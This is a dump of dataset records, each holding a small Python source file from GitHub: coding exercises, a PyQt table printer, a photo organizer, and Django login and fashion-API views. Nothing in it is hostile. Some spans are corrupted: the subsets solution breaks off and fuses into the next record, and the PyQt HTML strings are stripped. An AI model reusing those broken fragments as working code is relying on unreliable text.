editId=edit_id,\n packageName=package_name,\n apkVersionCode=jsdata['version_code'],\n expansionFileType='main',\n media_body=comp_file).execute()\n\n logger.debug(\"Expansion file of size {} has been uploaded\"\n .format(comp_response['expansionFile']['fileSize']))\n\n commit_request = service.edits().commit(\n editId=edit_id, packageName=package_name).execute()\n\n logger.debug(\"Edit `{}` has been committed. 
done.\"\n .format(commit_request['id']))\n\n except client.AccessTokenRefreshError:\n logger.error(\"The credentials have been revoked or expired, \"\n \"please re-run the application to re-authorize\")\n\nSTORES = {\n 'play_store': upload_to_play_store,\n}\n\n\ndef main(json_path, store='{}:{}'.format(PLAY_STORE, ALPHA), *args):\n jsdata = json.load(get_local_remote_fd(json_path))\n\n logger.info(\"Uploading {} APK to {}\".format(jsdata['package'], store))\n\n try:\n store, channel = store.split(':', 1)\n except (IndexError, ValueError):\n channel = None\n\n STORES.get(store)(jsdata, channel=channel)\n\nif __name__ == '__main__':\n # ensure we were provided a JSON file as first argument\n if len(sys.argv) < 2:\n usage(sys.argv[0], 1)\n else:\n jspath = sys.argv[1]\n args = sys.argv[2:]\n\n main(jspath, *args)\n","repo_name":"kiwix/kiwix-xulrunner","sub_path":"android/upload-apk.py","file_name":"upload-apk.py","file_ext":"py","file_size_in_byte":8282,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"81"} +{"seq_id":"23305874344","text":"# Python Program To Read Characters From A Text File\r\n\r\n'''\r\nFunction Name : Read Characters From A Text File\r\nFunction Date : 24 Sep 2020\r\nFunction Author : Prasad Dangare\r\nInput : String\r\nOutput : String\r\n'''\r\n\r\nf = open('myfile.txt', 'r')\r\n\r\n# Read All Characters From File\r\n\r\nstr = f.read()\r\n\r\n# Display Them On The Screen\r\n\r\nprint(str)\r\n\r\n# Closing The File\r\n\r\nf.close()\r\n\r\n","repo_name":"PRASAD-DANGARE/PYTHON","sub_path":"files2.py","file_name":"files2.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"23337949828","text":"import re\n\nf = open(\"input.txt\", \"r\")\ntVisited = [[False for _ in range(300)] for _ in range(300)]\nhPos = [150, 150]\ntPos = [150, 150]\n\n\ndef calc_tpos():\n # Calc tail pos\n if y_diff() == 0 and abs(x_diff()) > 1:\n tPos[0] += (1 if x_diff() > 0 else -1)\n elif x_diff() == 0 and abs(y_diff()) > 1:\n tPos[1] += (1 if y_diff() > 0 else -1)\n elif abs(x_diff()) + abs(y_diff()) <= 2:\n return\n else:\n x_dir = (1 if x_diff() > 0 else -1)\n y_dir = (1 if y_diff() > 0 else -1)\n tPos[0] += x_dir\n tPos[1] += y_dir\n\n tVisited[tPos[0]][tPos[1]] = True\n\n\ndef x_diff():\n return hPos[0] - tPos[0]\n\n\ndef y_diff():\n return hPos[1] - tPos[1]\n\n\ntVisited[150][150] = True\n\nfor line in f:\n input_line = line.strip()\n input_re = re.compile(\"(.) 
(\\\\d+)\")\n input_match = input_re.match(input_line)\n dir = input_line[0]\n count = int(input_match.group(2))\n\n if dir == 'U':\n # hPos[0] += count\n for i in range(count):\n hPos[0] += 1\n calc_tpos()\n elif dir == 'D':\n # hPos[0] -= count\n for i in range(count):\n hPos[0] -= 1\n calc_tpos()\n elif dir == 'L':\n # hPos[1] -= count\n for i in range(count):\n hPos[1] -= 1\n calc_tpos()\n elif dir == 'R':\n # hPos[1] += count\n for i in range(count):\n hPos[1] += 1\n calc_tpos()\n else:\n raise RuntimeError(\"Unknown dir: \" + dir)\n\nvisited_count = 0\nfor i in tVisited:\n for j in i:\n if j:\n visited_count += 1\nprint(visited_count)\n","repo_name":"nyw18/advent-of-code-2022","sub_path":"09/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3800864582","text":"from utilities.inv import __inv__\n# binary search\n# assume that myList is sorted in an ascending order\n\nmyList = [18, 57, 96, 103, 132, 211, 231, 295, 296, 314, 315, 400, 441, 488, 613, 636, 766, 791, 830, 863]\nx = 132\nlow = 0\nhigh = len(myList) - 1\nmid = 0\nres = -1\nwhile low <= high and (res == -1):\n\t__inv__(myList=myList, x=x, low=low, high=high, mid=mid, res=res)\n\tmid = int((high + low) / 2)\n\n\tif myList[mid] < x:\n\t\tlow = mid + 1\n\telif myList[mid] > x:\n\t\thigh = mid - 1\n\telse:\n\t\tres = mid\n","repo_name":"AbuJabal-Hussein/Loop-Invariant-Synthesizer","sub_path":"benchmarks/hybrid_benchmarks/test2/test2_hybrid.py","file_name":"test2_hybrid.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"6742710367","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 4 11:59:44 2018\n\n@author: CHARLES\n\"\"\"\nfrom PyQt4.QtCore import SIGNAL, QSizeF\nfrom PyQt4.QtGui import QTextCursor, QPrinter, QFont, QTextDocument, QPrintDialog, QWidget, QFrame, QDateEdit, QPrintPreviewDialog, QCheckBox, QHBoxLayout, QGroupBox, QGridLayout, QDialog, QApplication, QPushButton, QLineEdit, QFormLayout, QLabel, QVBoxLayout\n\n\nclass PrintTable(QDialog):\n \n def __init__(self, table, parent=None):\n super(PrintTable, self).__init__(parent)\n self.table = table\n #self.handlePreview()\n #self.handlePrintPdf()\n \n def handlePrintPdf(self):\n printer = QPrinter()\n pdffile ='test.pdf'\n printer.setResolution(96)\n printer.setPageSize(QPrinter.Letter)\n printer.setOutputFormat(QPrinter.PdfFormat)\n printer.setOutputFileName(pdffile)\n printer.setPageMargins(5, 5, 5, 10, QPrinter.Millimeter)\n document = self.makeTableDocument()\n \n document.setPageSize(QSizeF(printer.pageRect().size()))\n document.print_(printer)\n \n \n def handlePrint(self):\n dialog = QPrintDialog()\n if dialog.exec_() == QDialog.Accepted:\n self.handlePaintRequest(dialog.printer())\n\n def handlePreview(self):\n dialog = QPrintPreviewDialog()\n dialog.setStyleSheet(\"table {border:1px; border-color:teal}\")\n dialog.setWindowTitle('Adedoyin Adetunji')\n #dialog.showMaximized()\n #dialog.setMaximumSize(True)\n #dialog.setResolution(96)\n #dialog.setPageSize(QPrinter.Letter)\n #dialog.setPageMargins(5, 5, 5, 10, QPrinter.Millimeter)\n dialog.paintRequested.connect(self.handlePaintRequest)\n dialog.exec_()\n \n def handlePaintRequest(self, printer):\n document = self.makeTableDocument()\n document.print_(printer)\n\n def makeTableDocument(self):\n printer = QPrinter()\n document = QTextDocument()\n 
document.setDefaultStyleSheet(\"table {border:1px; border-color:teal}\")\n document.setDefaultStyleSheet(\"h1, h2, h3 {color:teal}\")\n document.setDocumentMargin(0.0)\n document.setPageSize(QSizeF(printer.pageRect().size()))\n header = '''\n \n \n
Desmond International College
Km4, Happiness Street, Kafanchan
Kaduna, Nigeria
STUDENT DATA TABLE
\n \n \n '''\n #print(dir(document))\n \n cursor = QTextCursor(document)\n rows = self.table.rowCount()\n columns = self.table.columnCount()\n cursor.insertHtml(header)\n table = cursor.insertTable(rows + 1, columns)\n formats = table.format()\n formats.setHeaderRowCount(1)\n table.setFormat(formats)\n formats = cursor.blockCharFormat()\n formats.setFontWeight(QFont.Bold)\n for column in range(columns):\n cursor.setCharFormat(formats)\n cursor.insertText(self.table.horizontalHeaderItem(column).text())\n cursor.movePosition(QTextCursor.NextCell)\n for row in range(rows):\n for column in range(columns):\n cursor.insertText(self.table.item(row, column).text())\n cursor.movePosition(QTextCursor.NextCell)\n \n \n return document\n \n def makeHeader(self):\n header = '''\n \n \n
Desmond International College
Km4, Happiness Street, Kafanchan
Kaduna, Nigeria
STUDENT DATA TABLE
\n \n \n '''\n return header\n \n def makeTable(self, cols, rows, data):\n \n table = '
'\n        table +='
SeverityRuleDescription
'\n table +=''\n table +=''\n for a in cols:\n table +='' \n table +=''\n table +=''\n table +=''\n table +=''\n \n table +='
'\n table += str(a)\n table +='
'\n table +=''\n \n \n return table","repo_name":"doyinspc/schoolmgtapp","sub_path":"connect/printtable.py","file_name":"printtable.py","file_ext":"py","file_size_in_byte":5036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"8540015032","text":"import os\n\nfrom ament_index_python.packages import get_package_share_directory\nfrom launch import LaunchDescription\n\nfrom launch.actions.include_launch_description import IncludeLaunchDescription\nfrom launch.launch_description_sources.python_launch_description_source import PythonLaunchDescriptionSource # noqa: E501\nimport launch_ros.actions\nimport yaml\n\n\ndef load_file(package_name, file_path):\n\n package_path = get_package_share_directory(package_name)\n absolute_file_path = os.path.join(package_path, file_path)\n\n try:\n with open(absolute_file_path, 'r') as file:\n return file.read()\n except EnvironmentError: # parent of IOError, OSError *and* WindowsError where available\n print('Couldnt load file ' + absolute_file_path)\n return None\n\n\ndef load_yaml(package_name, file_path):\n\n package_path = get_package_share_directory(package_name)\n absolute_file_path = os.path.join(package_path, file_path)\n\n try:\n with open(absolute_file_path, 'r') as file:\n return yaml.safe_load(file)\n except EnvironmentError: # parent of IOError, OSError *and* WindowsError where available\n print('Couldnt load yaml ' + absolute_file_path)\n return None\n\n\ndef generate_launch_description():\n\n robot_config_file = get_package_share_directory('robot_control') + \"/config/lbr_iiwa.yaml\"\n kuka_sunrise_dir = get_package_share_directory('kuka_sunrise')\n\n kuka_sunrise_interface = IncludeLaunchDescription(\n PythonLaunchDescriptionSource([kuka_sunrise_dir, '/launch/kuka_sunrise.launch.py'])\n )\n\n joint_controller = launch_ros.actions.LifecycleNode(\n namespace=\"\", package='robot_control', executable='rate_scaled_controller', output='both',\n arguments=['--ros-args', '--log-level', 'info'], parameters=[robot_config_file,\n {'reference_rate': 12.0}],\n name='joint_controller', remappings=[('measured_joint_state', 'lbr_joint_state'),\n ('joint_command', 'lbr_joint_command')]\n )\n\n system_manager = launch_ros.actions.LifecycleNode(\n package='teleop_guided_robot', executable='system_manager', output='screen',\n name='system_manager', namespace=\"\"\n )\n\n map_arm = launch_ros.actions.Node(\n package='map_arm', executable='map_arm', output='screen', name='map_arm'\n )\n\n return LaunchDescription([\n kuka_sunrise_interface,\n system_manager,\n joint_controller,\n map_arm\n ])\n","repo_name":"kroshu/kinect_ros","sub_path":"map_arm/launch/kinect_driver_arm_tracking.launch.py","file_name":"kinect_driver_arm_tracking.launch.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"31392337236","text":"class Solution:\n def subsetsWithDup(self, nums: List[int]) -> List[List[int]]:\n sol, new_sol = list(), list() \n def dfs(visit, pos):\n if pos == len(nums):\n l = []\n for i in range(len(nums)):\n if visit&(1< 0:\n l.append(nums[i])\n sol.append(l)\n return\n dfs(visit, pos+1)\n dfs(visit|(1<= 0:\r\n c1 = c1 - 1\r\n max_n2 = int(nn1[c1])\r\n if max_n2 > max_n1:\r\n max_n1 = max_n2 \r\nprint('Максимальная цифра', max_n1) \r\n\r\n##################################################\r\n#Запросите у пользователя значения выручки и издержек фирмы. 
\r\n#Определите, с каким финансовым результатом работает фирма. \r\n#Например, прибыль — выручка больше издержек, или убыток — издержки \r\n#больше выручки. Выведите соответствующее сообщение.\r\n \r\nrevenue = int(input('Введите размер Вашей выручки... '))\r\ncost = int(input('Введите размер Ваших издержек... '))\r\n\r\nif revenue > cost:\r\n a = revenue - cost\r\n print('Ура! вы заработали. Ваш доход составляет', a, 'руб.')\r\nelse:\r\n a = cost - revenue\r\n print('Ваши финансы поют романсы. Вы ушли в минус на', a, 'руб.')\r\n\r\n#####################################################\r\n# Если фирма отработала с прибылью, вычислите рентабельность выручки. \r\n# Это отношение прибыли к выручке. \r\n# Далее запросите численность сотрудников фирмы и определите прибыль \r\n# фирмы в расчёте на одного сотрудника.\r\n\r\n\r\nprofit = revenue - cost\r\nprofitability = profit / revenue\r\nprint('Рентабельность составляет', profitability)\r\nstaff = int(input('Введите количество сотрудников... '))\r\nstaff_m = profit / staff\r\nprint('Прибыль на одного сотрудника составляет', staff_m)\r\n\r\n######################################################\r\ndistance_a = float(input('Введите расстояние, которое Вы пробежали в первый день... '))\r\ndistance_b = float(input('Введите расстояние, которое Вы хотели бы преодолеть... '))\r\ndistance_day_1 = distance_a * 1.1\r\nday = 2\r\nwhile distance_b > distance_day_1:\r\n distance_b /= 1.1\r\n day = day + 1\r\nprint('Вы достигните желаемого результата на ', day,'-й день')","repo_name":"kogb/GB_1_Python_Basics","sub_path":"220418 homework 1.py","file_name":"220418 homework 1.py","file_ext":"py","file_size_in_byte":3791,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17866463007","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\nfrom __future__ import print_function, absolute_import\n\nimport os\nimport shutil\n\nfrom PIL import Image\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.orm.exc import NoResultFound\nimport reusables\n\nfrom pyfoto.database import File, Tag, Base\nfrom pyfoto.config import get_config, save_config, get_stream_logger\n\nlogger = get_stream_logger(\"organizer\")\n\n\nclass Organize:\n\n def __init__(self, config_file: str=\"config.yaml\", engine=None):\n\n self.config = get_config(config_file)\n\n if not engine:\n engine = create_engine(self.config.connect_string)\n Base.metadata.create_all(engine, checkfirst=True)\n self.session = sessionmaker(bind=engine)()\n\n self.ensure_exists(self.config.storage_directory)\n self.save_config()\n\n @staticmethod\n def ensure_exists(directory: str) -> None:\n \"\"\"\n If a specified path does not exist, create it.\n\n :param directory: Path to make sure exists.\n :return:\n \"\"\"\n\n if directory and not os.path.exists(directory):\n os.makedirs(directory)\n\n @staticmethod\n def file_extension(file: str) -> str:\n \"\"\"\n Returns the extension of the file.\n\n :param file: Path to file as string.\n :return:\n \"\"\"\n\n ext = file.rsplit(\".\", 1)[1].lower()\n if ext == \"jpeg\":\n ext = \"jpg\"\n if ext == \"tiff\":\n ext = \"tif\"\n return ext\n\n def file_info(self, file: str) -> tuple:\n \"\"\"\n Returns file information.\n\n :param file: Path to file as string.\n :return:\n \"\"\"\n\n sha256 = reusables.file_hash(file, \"sha256\")\n ext = self.file_extension(file)\n size = os.path.getsize(file)\n\n return sha256, ext, size\n\n def already_ingested(self, sha256: str) -> bool:\n 
\"\"\"\n Determine if an item has already been ingested by\n comparing it to existing SHA256s.\n\n :param sha256:\n :return:\n \"\"\"\n\n if self.session.query(File).filter(File.sha256 == sha256).all():\n return True\n return False\n\n def _tag_strings_to_tags(self, tags: tuple) -> list:\n \"\"\"\n Take a list of strings that represent tags\n and return SQLAlchemy objects.\n\n :param tags: list of string tags.\n :return: list of SQLAlchemy objects.\n \"\"\"\n\n tags = list(tags)\n\n add_tags = []\n for tag in tags:\n try:\n add_tag = self.session.query(Tag).filter(Tag.tag == tag).one()\n except NoResultFound:\n add_tag = Tag(tag=tag)\n self.session.add(add_tag)\n if add_tag in add_tags:\n continue\n add_tags.append(add_tag)\n\n return add_tags\n\n def _ingest(self, file: str, ingest_path: str, sha256: str,\n tags: tuple=()) -> None:\n \"\"\"\n Copy a file to the new location and verify it was\n copied completely with the hash. Also create a thumbnail of the item.\n\n :param file:\n :param ingest_path:\n :param sha256:\n :param tags:\n :return:\n \"\"\"\n\n full_path = os.path.join(self.config.storage_directory, ingest_path)\n\n self.ensure_exists(os.path.dirname(full_path))\n\n if os.path.exists(full_path):\n raise Exception(\"File already exists and should not, halting. \"\n \"{0}\".format(full_path))\n\n shutil.copy(file, full_path)\n new_sha256, ext, size = self.file_info(full_path)\n\n if new_sha256 != sha256:\n logger.error(\"File {0} did not copy correctly!\".format(file))\n os.unlink(full_path)\n return\n\n thumb_path = os.path.join(\"thumbs\", ingest_path.rsplit(\".\")[0] + \".jpg\")\n thumb_dir = os.path.join(self.config.storage_directory, thumb_path)\n\n try:\n width, height = self.create_thumbnail(full_path, thumb_dir)\n except Exception as err:\n logger.exception(\"Count not create thumbnail for {0}, will \"\n \"redirect to main image. 
\"\n \"Error: {1}\".format(file, err))\n thumb_path = ingest_path\n width, height = 0, 0\n\n new_file = File(path=ingest_path, sha256=sha256, extension=ext,\n size=size, filename=os.path.basename(file),\n thumbnail=thumb_path, width=width, height=height,\n tags=self._tag_strings_to_tags(tags))\n\n self.session.add(new_file)\n if self.config.remove_source:\n os.unlink(file)\n\n def save_config(self) -> None:\n \"\"\"\n Convert the config to dict and write it out to the YAML file.\n\n :return:\n \"\"\"\n\n save_config(self.config.to_dict())\n\n def add_images(self, directory: str, tags: tuple=()):\n \"\"\"\n Go through a directory for all image files and ingest them.\n\n :param breaker:\n :param directory:\n :param tags:\n :return:\n \"\"\"\n\n total = 0\n # I don't use enumerate because I have to return the number at the end\n for file in reusables.find_all_files_generator(\n directory, ext=reusables.exts.pictures):\n total += 1\n if total % 20 == 0.0:\n logger.info(\"Ingested {0} images so far.\".format(total))\n\n sha256, ext, size = self.file_info(file)\n if (not self.config.ignore_duplicates and\n self.already_ingested(sha256)):\n logger.warning(\"file {0} already ingested\".format(file))\n continue\n\n self.config.file_inc += 1\n if self.config.file_inc > self.config.folder_limit:\n self.config.file_inc = 0\n self.config.dir_inc += 1\n self.session.commit()\n self.save_config()\n\n ingest_folder = self.config.dir_names.format(\n increment=self.config.dir_inc)\n\n ingest_path = os.path.join(ingest_folder,\n self.config.file_names.format(\n increment=self.config.file_inc,\n ext=ext,\n hash=sha256,\n size=size))\n\n try:\n self._ingest(file, ingest_path, sha256, tags=tags)\n except Exception as err:\n self.save_config()\n self.session.commit()\n raise err\n\n self.session.commit()\n self.save_config()\n return total\n\n def create_thumbnail(self, file: str, out_path: str,\n width: int=250, height: int=250) -> tuple:\n \"\"\"\n Create a thumbnail with Pillow then save it to the out_path. 
It will\n return the original image's width and height.\n\n :param file:\n :param out_path:\n :param width:\n :param height:\n :return:\n \"\"\"\n\n self.ensure_exists(os.path.dirname(out_path))\n im = Image.open(file)\n org_width, org_height = im.size\n im.thumbnail((width, height))\n try:\n im.save(out_path, \"JPEG\")\n except OSError:\n im.convert('RGB').save(out_path, \"JPEG\")\n return org_width, org_height\n\n def pull_deleted(self, move_dir=None):\n if not move_dir:\n move_dir = os.path.join(self.config.storage_directory, os.path.pardir, \"pyfoto_deleted\")\n self.ensure_exists(move_dir)\n all_deleted = self.session.query(File).filter(File.deleted == 1).filter(File.path != None).all()\n logger.info(\"{} deleted files about to be processed\".format(len(all_deleted)))\n for item in all_deleted:\n if item.path and os.path.exists(os.path.join(self.config.storage_directory, item.path)):\n shutil.move(os.path.join(self.config.storage_directory, item.path), os.path.join(move_dir, \"{}.{}\".format(item.sha256, item.extension)))\n item.path = None\n item.tags = []\n self.session.commit()\n\n def pull_tag(self, tag=\"edit\", move_dir=None, delete=True):\n if not move_dir:\n move_dir = os.path.join(self.config.storage_directory, os.path.pardir, \"pyfoto_{}\".format(tag))\n self.ensure_exists(move_dir)\n all_edits = self.session.query(File).filter(File.tags.any(Tag.tag == tag)).all()\n logger.info(\"{} edited files about to be processed\".format(len(all_edits)))\n for item in all_edits:\n if item.path and os.path.exists(os.path.join(self.config.storage_directory, item.path)):\n shutil.move(os.path.join(self.config.storage_directory, item.path), os.path.join(move_dir, \"{}.{}\".format(item.sha256, item.extension)))\n if delete:\n item.deleted = 1\n item.tags = []\n item.path = None\n self.session.commit()\n","repo_name":"cdgriffith/PyFoto","sub_path":"pyfoto/organizer.py","file_name":"organizer.py","file_ext":"py","file_size_in_byte":9144,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"72987580104","text":"N = int(input())\nB = [int(input()) for _ in range(N-1)]\n\nfigure = [[] for _ in range(N)]\n\nfor i in range(N-1):\n figure[B[i]-1].append(i+1)\n\nsalary = [0]*N\n\nfor i in range(N-1, -1, -1):\n if len(figure[i]) == 0:\n salary[i] = 1\n elif len(figure[i]) == 1:\n n = figure[i][0]\n salary[i] = salary[n]*2 + 1\n else:\n minSalary = float('INF')\n maxSalary = -float('INF')\n for j in figure[i]:\n if minSalary > salary[j]:\n minSalary = salary[j]\n if maxSalary < salary[j]:\n maxSalary = salary[j]\n salary[i] = maxSalary + minSalary + 1\n\nprint(salary[0])","repo_name":"hiraiwa0928/PracticalAlgorithmSkillTest","sub_path":"MyProgram/abc026_c.py","file_name":"abc026_c.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74857246983","text":"from django.shortcuts import render\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .serializers import fashion_serializer\nfrom django.http import JsonResponse\nimport json\nfrom .utils import apt_query\nfrom .models import fashion\nimport random\n\n@csrf_exempt\ndef api_view(request):\n if request.method == \"GET\":\n keys=request.GET\n message=\"\"\n data={}\n serializer={}\n if len(keys)==0:\n data[\"random\"]=1\n queryset,message=apt_query(data)\n serializer=fashion_serializer(queryset)\n else:\n for i in keys:\n if i==\"place\" or i==\"accessories\":\n 
data[i]=request.GET.get(i).split(\",\")\n else:\n data[i]=request.GET.get(i)\n queryset,message=apt_query(data)\n serializer=fashion_serializer(queryset,many=True)\n return JsonResponse({\"message\":message,\"data\":serializer.data},safe=False)\n elif request.method == \"POST\":\n print(json.loads(request.body))\n return JsonResponse({\"message\":\"POST request\"})\n\n","repo_name":"governedbyprudence/FashionAPI","sub_path":"base/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"23730106174","text":"import hashlib\nimport datetime\n\nfrom django.shortcuts import render\nfrom django.shortcuts import redirect\n\nfrom django.conf import settings\nfrom login import models\nfrom login import forms\nfrom login import face\nimport json\n# Create your views here.\n\n\ndef hash_code(s, salt='mysite'):# 加点盐\n h = hashlib.sha256()\n s += salt\n h.update(s.encode()) # update方法只接收bytes类型\n return h.hexdigest()\n\ndef index(request):\n request.session['index_active'] = 'active'\n request.session['detect_active'] = 'inactive'\n return render(request,'login/index.html')\n\n\ndef login(request):\n if request.session.get('is_login',None):\n return redirect('/index/')\n\n if request.method == 'POST':\n\n login_form = forms.UserForm(request.POST)\n message = \"\"\n\n if login_form.is_valid():\n username = login_form.cleaned_data['username']\n password = login_form.cleaned_data['password']\n\n try:\n user = models.User.objects.get(name=username)\n if not user.has_confirmed:\n message = '该用户还未通过邮件确认!'\n return render(request,'login/login.html',locals())\n if user.password == hash_code(password):\n request.session['is_login'] = True\n request.session['user_id'] = user.id\n request.session['user_name'] = user.name\n return redirect('/index/')\n else:\n message = \"密码不正确!\"\n except:\n message = \"用户名不存在!\"\n\n return render(request, 'login/login.html', locals())\n\n login_form = forms.UserForm()\n return render(request,'login/login.html',locals())\n\n\ndef make_confirm_string(user):\n now = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n code = hash_code(user.name,now)\n models.ConfirmString.objects.create(code=code,user=user)\n return code\n\ndef send_email(email,code):\n from django.core.mail import EmailMultiAlternatives\n\n subject = '注册确认邮件'\n\n text_content = '''感谢注册www.liujiangblog.com,这里是刘江的博客和教程站点,专注于Python和Django技术的分享!\\\n 如果你看到这条消息,说明你的邮箱服务器不提供HTML链接功能,请联系管理员!'''\n\n html_content = '''\n

感谢注册www.liujiangblog.com,\\\n            这里是刘江的博客和教程站点,专注于Python和Django技术的分享!
请点击站点链接完成注册确认!
此链接有效期为{}天!
\n '''.format('127.0.0.1:8000', code, settings.CONFIRM_DAYS)\n msg = EmailMultiAlternatives(subject, text_content, settings.EMAIL_HOST_USER, [email])\n msg.attach_alternative(html_content, \"text/html\")\n msg.send()\n\ndef register(request):\n if request.session.get('is_login',None):\n return redirect('/index/')\n\n if request.method == 'POST':\n register_form = forms.RegisterForm(request.POST)\n message = \"\"\n\n if register_form.is_valid():\n username = register_form.cleaned_data['username']\n password1 = register_form.cleaned_data['password1']\n password2 = register_form.cleaned_data['password2']\n email = register_form.cleaned_data['email']\n sex = register_form.cleaned_data['sex']\n\n if password1 != password2:\n message = \"两次输入的密码不同!\"\n return render(request,'login/register.html',locals())\n else:\n same_name_user = models.User.objects.filter(name=username)\n if same_name_user:\n message = \"用户已存在,请重新选择用户名!\"\n return render(request,'login/register.html',locals())\n same_email_user = models.User.objects.filter(email=email)\n if same_email_user:\n message = \"该邮箱地址已被注册,请使用其他邮箱!\"\n return render(request,'login/register.html',locals())\n\n new_user = models.User()\n new_user.name = username\n new_user.password = hash_code(password1)\n new_user.email = email\n new_user.sex = sex\n new_user.save()\n\n code = make_confirm_string(new_user)\n return redirect('/login/')\n register_form = forms.RegisterForm()\n return render(request,'login/register.html',locals())\n\ndef logout(request):\n if not request.session.get('is_login',None):\n return redirect('/index/')\n request.session.flush()\n return redirect(\"/index/\")\n\ndef user_confirm(request):\n code = request.GET.get('code',None)\n message = ''\n try:\n confirm = models.ConfirmString.objects.get(code=code)\n except:\n message = '无效的确认请求!'\n return render(request,'login/confirm.html',locals())\n\n c_time = confirm.c_time\n now = datetime.datetime.now()\n if now > c_time + datetime.timedelta(settings.CONFIRM_DAYS):\n confirm.user.delete()\n message = '您的邮件已经过期!请重新注册!'\n return render(request,'login/confirm.html',locals())\n else:\n confirm.user.has_confirmed = True\n confirm.user.save()\n confirm.delete()\n message = '感谢确认,请使用账户登录!'\n return render(request,'login/confirm.html',locals())\n\n\ndef detect(request):\n request.session['index_active'] = 'inactive'\n request.session['detect_active'] = 'active'\n if request.session.get('is_login', None):\n if request.method == 'GET':\n return render(request, 'login/detect.html', locals())\n\n if request.method == 'POST':\n file = request.FILES.get('file',None)\n file_path = settings.IMAGE_ROOT + file.name\n with open(file_path,'wb') as f:\n for i in file.chunks():\n f.write(i)\n file_src = file.name\n result = json.loads(face.FaceDetect(file_path))['faces'][0]['attributes']\n keys = ['emotion', 'gender', 'age', 'mouthstatus', 'glass', 'skinstatus', 'smile', 'eyestatus', 'ethnicity']\n image_result = {\n 'emotion':'',\n 'gender': '',\n 'age': '',\n 'glass': '',\n 'smile': '',\n 'ethnicity':''\n }\n if not result is None:\n for key in keys:\n if key == 'age' and result[key]['value']:\n image_result[key] = result[key]['value']\n\n if key == 'gender' and result[key]['value']:\n if result[key]['value'] == 'Male':\n image_result[key] = '男'\n elif result[key]['value'] == 'Female':\n image_result[key] = '女'\n else:\n image_result[key] = '未知'\n\n if key == 'glass' and result[key]['value']:\n if result[key]['value'] == 'Dark':\n image_result[key] = '戴墨镜'\n elif result[key]['value'] == 'Normal':\n 
image_result[key] = '戴眼镜'\n\n if key == 'ethnicity' and result[key]['value']:\n if result[key]['value'] == 'ASIAN':\n image_result[key] = '亚洲人'\n elif result[key]['value'] == 'WHITE':\n image_result[key] = '白人'\n elif result[key]['value'] == 'BLACK':\n image_result[key] = '黑人'\n\n if key == 'smile' and result[key]['value']:\n if result[key]['value'] > result[key]['threshold']:\n image_result[key] = '微笑'\n\n if key == 'emotion':\n emotion = max(result[key],key=result[key].get)\n if emotion == 'surprise':\n image_result[key] = '惊讶'\n elif emotion == 'amger':\n image_result[key] = '愤怒'\n elif emotion == 'disgust':\n image_result[key] = '厌恶'\n elif emotion == 'fear':\n image_result[key] = '恐惧'\n elif emotion == 'happiness':\n image_result[key] = '高兴'\n elif emotion == 'neutral':\n image_result[key] = '平静'\n elif emotion == 'sadness':\n image_result[key] = '伤心'\n return render(request, 'login/detect.html', locals())\n else:\n return redirect('/login/')\n","repo_name":"Handsun/Face","sub_path":"login/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"6733879096","text":"\"\"\"\nutf-8\nСоздан 26.10.2021\n\n:author: maria.kalashnikova\n\nОбучающий курс Python QA Engineer.\nДомашняя работа №2. Класс треугольников.\n\"\"\"\nfrom oop_pattern.src.figure import Figure\n\n\nclass Triangle(Figure):\n \"\"\"\n Класс для создания треугольников\n\n Могут быть созданы треугольники:\n - равносторонний - необходимо передать 1 аргумент (длинну стороны)\n - равнобедренный - необходимо передать 2 аргумента (длинну основания и длину стороны)\n - обыкновенный - необходимо передать 3 аргумента (длинну каждой стороны)\n \"\"\"\n name = \"Triangle\"\n\n def __new__(cls, *args, **kwargs):\n for arg in args:\n if isinstance(arg, (int, float)) is False:\n raise ValueError(f\"Side value can be an int or float, not {type(arg)}\")\n if arg <= 0:\n raise ValueError(f\"The side length must be a positive value, not {arg}\")\n if len(args) == 3:\n if (args[0] + args[1] > args[2] and args[0] + args[2] > args[1] and args[1] + args[2] > args[0]) is False:\n return None\n else:\n new_obj = object.__new__(cls)\n return new_obj\n else:\n new_obj = object.__new__(cls)\n return new_obj\n\n def __init__(self, *args):\n if len(args) == 1:\n self.side_values = [args[0], args[0], args[0]]\n elif len(args) == 2:\n self.side_values = [args[0], args[1], args[1]]\n elif len(args) == 3:\n self.side_values = []\n for arg in args:\n self.side_values.append(arg)\n else:\n raise ValueError(\"it's not a triangle. Maximum 3 values can be passed\")\n\n @property\n def area(self):\n semi_perimeter = self.perimeter/2\n base_of_degree = 1\n for side in self.side_values:\n factor = (semi_perimeter - side)\n base_of_degree *= factor\n area = (base_of_degree * semi_perimeter) ** 0.5\n return round(area, 2)\n\na = Triangle(13, 14, 15)\nprint(a.perimeter)","repo_name":"maria-kalashnikova/autotests","sub_path":"oop_pattern/src/triangle.py","file_name":"triangle.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} 